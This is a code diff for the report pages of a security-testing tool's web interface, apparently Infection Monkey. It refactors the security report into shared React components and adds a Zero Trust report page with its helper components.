-import ScannedServers from 'components/report-components/ScannedServers';
-import PostBreach from 'components/report-components/PostBreach';
+import BreachedServers from 'components/report-components/security/BreachedServers';
+import ScannedServers from 'components/report-components/security/ScannedServers';
+import PostBreach from 'components/report-components/security/PostBreach';
 import {ReactiveGraph} from 'components/reactive-graph/ReactiveGraph';
 import {edgeGroupToColor, options} from 'components/map/MapOptions';
-import StolenPasswords from 'components/report-components/StolenPasswords';
-import CollapsibleWellComponent from 'components/report-components/CollapsibleWell';
+import StolenPasswords from 'components/report-components/security/StolenPasswords';
+import CollapsibleWellComponent from 'components/report-components/security/CollapsibleWell';
 import {Line} from 'rc-progress';
 import AuthComponent from '../AuthComponent';
 import PassTheHashMapPageComponent from "./PassTheHashMapPage";
-import StrongUsers from "components/report-components/StrongUsers";
-import AttackReport from "components/report-components/AttackReport";
+import StrongUsers from "components/report-components/security/StrongUsers";
+import AttackReport from "components/report-components/security/AttackReport";
+import ReportHeader, {ReportTypes} from "../report-components/common/ReportHeader";
+import MonkeysStillAliveWarning from "../report-components/common/MonkeysStillAliveWarning";
+import ReportLoader from "../report-components/common/ReportLoader";
+import MustRunMonkeyWarning from "../report-components/common/MustRunMonkeyWarning";
+import SecurityIssuesGlance from "../report-components/common/SecurityIssuesGlance";
+import PrintReportButton from "../report-components/common/PrintReportButton";
+import {extractExecutionStatusFromServerResponse} from "../report-components/common/ExecutionStatus";

 let guardicoreLogoImage = require('../../images/guardicore-logo.png');
-let monkeyLogoImage = require('../../images/monkey-icon.svg');

 class ReportPageComponent extends AuthComponent {

@@ -66,18 +73,11 @@ class ReportPageComponent extends AuthComponent {

   render() {
     let content;
-    if (Object.keys(this.state.report).length === 0) {
-      if (this.state.runStarted) {
-        content = (<h1>Generating Report...</h1>);
-      } else {
-        content =
-          <p className="alert alert-warning">
-            <i className="glyphicon glyphicon-warning-sign" style={{'marginRight': '5px'}}/>
-            You have to run a monkey before generating a report!
-          </p>;
-      }
-    } else {
+    if (this.state.runStarted) {
       content = this.generateReportContent();
+    } else {
+      content = <MustRunMonkeyWarning/>;
     }

     return (
@@ -90,15 +90,15 @@
     );
   }

+  stillLoadingDataFromServer() {
+    return Object.keys(this.state.report).length === 0;
+  }
+
   updateMonkeysRunning = () => {
     return this.authFetch('/api')
       .then(res => res.json())
       .then(res => {
-        // This check is used to prevent unnecessary re-rendering
-        this.setState({
-          allMonkeysAreDead: (!res['completed_steps']['run_monkey']) || (res['completed_steps']['infection_done']),
-          runStarted: res['completed_steps']['run_monkey']
-        });
+        this.setState(extractExecutionStatusFromServerResponse(res));
         return res;
       });
   };
@@ -117,7 +117,7 @@

   getReportFromServer(res) {
     if (res['completed_steps']['run_monkey']) {
-      this.authFetch('/api/report')
+      this.authFetch('/api/report/security')
         .then(res => res.json())
         .then(res => {
           this.setState({
@@ -128,49 +128,36 @@
   }

   generateReportContent() {
+    let content;
+
+    if (this.stillLoadingDataFromServer()) {
+      content = <ReportLoader loading={true}/>;
+    } else {
+      content =
+        <div>
+          {this.generateReportOverviewSection()}
+          {this.generateReportFindingsSection()}
+          {this.generateReportRecommendationsSection()}
+          {this.generateReportGlanceSection()}
+          {this.generateAttackSection()}
+          {this.generateReportFooter()}
+        </div>;
+    }
+
     return (
-      <div>
-        <div className="text-center no-print" style={{marginBottom: '20px'}}>
-          <Button bsSize="large" onClick={() => {
-            print();
-          }}><i className="glyphicon glyphicon-print"/> Print Report</Button>
+      <Fragment>
+        <div style={{marginBottom: '20px'}}>
+          <PrintReportButton onClick={() => {print();}} />
         </div>
         <div className="report-page">
-          {this.generateReportHeader()}
+          <ReportHeader report_type={ReportTypes.security}/>
           <hr/>
-          {this.generateReportOverviewSection()}
-          {this.generateReportFindingsSection()}
-          {this.generateReportRecommendationsSection()}
-          {this.generateReportGlanceSection()}
-          {this.generateAttackSection()}
-          {this.generateReportFooter()}
+          {content}
         </div>
-        <div className="text-center no-print" style={{marginTop: '20px'}}>
-          <Button bsSize="large" onClick={() => {
-            print();
-          }}><i className="glyphicon glyphicon-print"/> Print Report</Button>
+        <div style={{marginTop: '20px'}}>
+          <PrintReportButton onClick={() => {print();}} />
         </div>
-      </div>
+      </Fragment>
     );
   }
-
-  generateReportHeader() {
-    return (
-      <div id="header" className="row justify-content-between">
-        <Col xs={8}>
-          <div>
-            <h1 style={{marginTop: '0px', marginBottom: '5px', color: '#666666', fontFamily: 'Alegreya'}}>Security Report</h1>
-            <h1 style={{marginTop: '0px', marginBottom: '0px', color: '#ffcc00', fontFamily: 'Alegreya'}}>Infection <b>Monkey</b></h1>
-          </div>
-        </Col>
-        <Col xs={4}>
-          <img src={monkeyLogoImage}
-               style={{
-                 float: 'right',
-                 width: '80px'
-               }}/>
-        </Col>
-      </div>
-    );
-  }
@@ -180,27 +167,8 @@
         <h2>
           Overview
         </h2>
-        {
-          this.state.report.glance.exploited.length > 0 ?
-            (<p className="alert alert-danger">
-              <i className="glyphicon glyphicon-exclamation-sign" style={{'marginRight': '5px'}}/>
-              Critical security issues were detected!
-            </p>) :
-            (<p className="alert alert-success">
-              <i className="glyphicon glyphicon-ok-sign" style={{'marginRight': '5px'}}/>
-              No critical security issues were detected.
-            </p>)
-        }
-        {
-          this.state.allMonkeysAreDead ?
-            ''
-            :
-            (<p className="alert alert-warning">
-              <i className="glyphicon glyphicon-warning-sign" style={{'marginRight': '5px'}}/>
-              Some monkeys are still running. To get the best report it's best to wait for all of them to finish
-              running.
-            </p>)
-        }
+        <SecurityIssuesGlance issuesFound={this.state.report.glance.exploited.length > 0}/>
+        <MonkeysStillAliveWarning allMonkeysAreDead={this.state.allMonkeysAreDead}/>
         {
           this.state.report.glance.exploited.length > 0 ?
             ''
@@ -0,0 +1,134 @@
import React, {Fragment} from 'react';
import {Col} from 'react-bootstrap';
import AuthComponent from '../AuthComponent';
import ReportHeader, {ReportTypes} from "../report-components/common/ReportHeader";
import ReportLoader from "../report-components/common/ReportLoader";
import MustRunMonkeyWarning from "../report-components/common/MustRunMonkeyWarning";
import PrintReportButton from "../report-components/common/PrintReportButton";
import {extractExecutionStatusFromServerResponse} from "../report-components/common/ExecutionStatus";
import SummarySection from "../report-components/zerotrust/SummarySection";
import FindingsSection from "../report-components/zerotrust/FindingsSection";
import PrinciplesSection from "../report-components/zerotrust/PrinciplesSection";

class ZeroTrustReportPageComponent extends AuthComponent {

  constructor(props) {
    super(props);

    this.state = {
      allMonkeysAreDead: false,
      runStarted: true
    };
  }

  componentDidMount() {
    this.updatePageState();
    const refreshInterval = setInterval(this.updatePageState, 8000);
    this.setState(
      {refreshDataIntervalHandler: refreshInterval}
    )
  }

  componentWillUnmount() {
    clearInterval(this.state.refreshDataIntervalHandler);
  }

  updateMonkeysRunning = () => {
    return this.authFetch('/api')
      .then(res => res.json())
      .then(res => {
        this.setState(extractExecutionStatusFromServerResponse(res));
        return res;
      });
  };

  updatePageState = () => {
    this.updateMonkeysRunning().then(res => this.getZeroTrustReportFromServer(res));
  };

  render() {
    let content;
    if (this.state.runStarted) {
      content = this.generateReportContent();
    } else {
      content = <MustRunMonkeyWarning/>;
    }

    return (
      <Col xs={12} lg={10}>
        <h1 className="page-title no-print">5. Zero Trust Report</h1>
        <div style={{'fontSize': '1.2em'}}>
          {content}
        </div>
      </Col>
    );
  }

  generateReportContent() {
    let content;

    if (this.stillLoadingDataFromServer()) {
      content = <ReportLoader loading={true}/>;
    } else {
      content = <div id="MainContentSection">
        <SummarySection allMonkeysAreDead={this.state.allMonkeysAreDead} pillars={this.state.pillars}/>
        <PrinciplesSection principles={this.state.principles}
                           pillarsToStatuses={this.state.pillars.pillarsToStatuses}/>
        <FindingsSection pillarsToStatuses={this.state.pillars.pillarsToStatuses} findings={this.state.findings}/>
      </div>;
    }

    return (
      <Fragment>
        <div style={{marginBottom: '20px'}}>
          <PrintReportButton onClick={() => {
            print();
          }}/>
        </div>
        <div className="report-page">
          <ReportHeader report_type={ReportTypes.zeroTrust}/>
          <hr/>
          {content}
        </div>
        <div style={{marginTop: '20px'}}>
          <PrintReportButton onClick={() => {
            print();
          }}/>
        </div>
      </Fragment>
    )
  }

  stillLoadingDataFromServer() {
    return typeof this.state.findings === "undefined"
      || typeof this.state.pillars === "undefined"
      || typeof this.state.principles === "undefined";
  }

  getZeroTrustReportFromServer() {
    let res;
    this.authFetch('/api/report/zero_trust/findings')
      .then(res => res.json())
      .then(res => {
        this.setState({
          findings: res
        });
      });
    this.authFetch('/api/report/zero_trust/principles')
      .then(res => res.json())
      .then(res => {
        this.setState({
          principles: res
        });
      });
    this.authFetch('/api/report/zero_trust/pillars')
      .then(res => res.json())
      .then(res => {
        this.setState({
          pillars: res
        });
      });
  }
}

export default ZeroTrustReportPageComponent;
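The page above issues three independent fetches and three separate setState calls. A minimal alternative sketch, assuming authFetch behaves like fetch() and the three endpoints return JSON as shown, would batch them with Promise.all; this is illustrative only and not part of the commit.

// Sketch only: load the three zero trust endpoints in one pass.
// Assumes authFetch(url) returns a fetch-like Promise of a Response.
function fetchZeroTrustReport(authFetch) {
  const endpoints = ['findings', 'principles', 'pillars'];
  return Promise.all(
    endpoints.map(name =>
      authFetch(`/api/report/zero_trust/${name}`).then(res => res.json())
    )
  ).then(([findings, principles, pillars]) => ({findings, principles, pillars}));
}

// Illustrative usage inside the component:
// fetchZeroTrustReport(url => this.authFetch(url)).then(state => this.setState(state));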
@@ -0,0 +1,6 @@
export function extractExecutionStatusFromServerResponse(res) {
  return {
    allMonkeysAreDead: (!res['completed_steps']['run_monkey']) || (res['completed_steps']['infection_done']),
    runStarted: res['completed_steps']['run_monkey']
  };
}
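A quick illustration of the mapping this helper performs; the response values below are made up, but the completed_steps shape matches the /api responses used elsewhere in this commit, and the import path assumes the snippet sits next to the helper's file.

import {extractExecutionStatusFromServerResponse} from "./ExecutionStatus";

// Hypothetical server response: the run has started but the infection is not done yet.
const res = {completed_steps: {run_monkey: true, infection_done: false}};

const status = extractExecutionStatusFromServerResponse(res);
// status is {allMonkeysAreDead: false, runStarted: true}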
@@ -0,0 +1,21 @@
import React, {Component} from "react";
import * as PropTypes from "prop-types";

export default class MonkeysStillAliveWarning extends Component {
  render() {
    return <div>
      {
        this.props.allMonkeysAreDead ?
          ''
          :
          (<p className="alert alert-warning">
            <i className="glyphicon glyphicon-warning-sign" style={{'marginRight': '5px'}}/>
            Some monkeys are still running. To get the best report it's best to wait for all of them to finish
            running.
          </p>)
      }
    </div>
  }
}

MonkeysStillAliveWarning.propTypes = {allMonkeysAreDead: PropTypes.bool};
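Illustrative usage only, mirroring how the security report overview above passes allMonkeysAreDead; the wrapper component and its import path are hypothetical.

import React from "react";
import MonkeysStillAliveWarning from "./MonkeysStillAliveWarning";

// Hypothetical wrapper: the alert is rendered only while allMonkeysAreDead is false.
export default function OverviewBanner({allMonkeysAreDead}) {
  return <MonkeysStillAliveWarning allMonkeysAreDead={allMonkeysAreDead}/>;
}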
@@ -0,0 +1,11 @@
import React, {Component} from "react";
import {NavLink} from "react-router-dom";

export default class MustRunMonkeyWarning extends Component {
  render() {
    return <p className="alert alert-warning">
      <i className="glyphicon glyphicon-warning-sign" style={{'marginRight': '5px'}}/>
      <b>You have to <NavLink to="/run-monkey">run a monkey</NavLink> before generating a report!</b>
    </p>
  }
}
@@ -0,0 +1,36 @@
import React, {Component} from "react";
import ReactTable from "react-table";
import * as PropTypes from "prop-types";

class PaginatedTable extends Component {
  render() {
    if (this.props.data.length > 0) {
      let defaultPageSize = this.props.data.length > this.props.pageSize ? this.props.pageSize : this.props.data.length;
      let showPagination = this.props.data.length > this.props.pageSize;

      return (
        <div>
          <ReactTable
            columns={this.props.columns}
            data={this.props.data}
            showPagination={showPagination}
            defaultPageSize={defaultPageSize}
          />
        </div>
      );
    }
    else {
      return (
        <div/>
      );
    }
  }
}

export default PaginatedTable;

PaginatedTable.propTypes = {
  data: PropTypes.array,
  columns: PropTypes.array,
  pageSize: PropTypes.number,
};
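Illustrative usage with made-up columns and rows; the {Header, accessor} column format follows react-table v6, the version pinned in package.json above, and the import path is assumed.

import React from "react";
import PaginatedTable from "./PaginatedTable";

// Hypothetical columns and data to show the expected props.
const columns = [
  {Header: 'Machine', accessor: 'machine'},
  {Header: 'Status', accessor: 'status'}
];

const data = [
  {machine: 'host-1', status: 'Failed'},
  {machine: 'host-2', status: 'Passed'}
];

export default function ExampleFindingsTable() {
  // Pagination controls appear only when there are more than pageSize rows.
  return <PaginatedTable columns={columns} data={data} pageSize={10}/>;
}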
Some files were not shown because too many files have changed in this diff.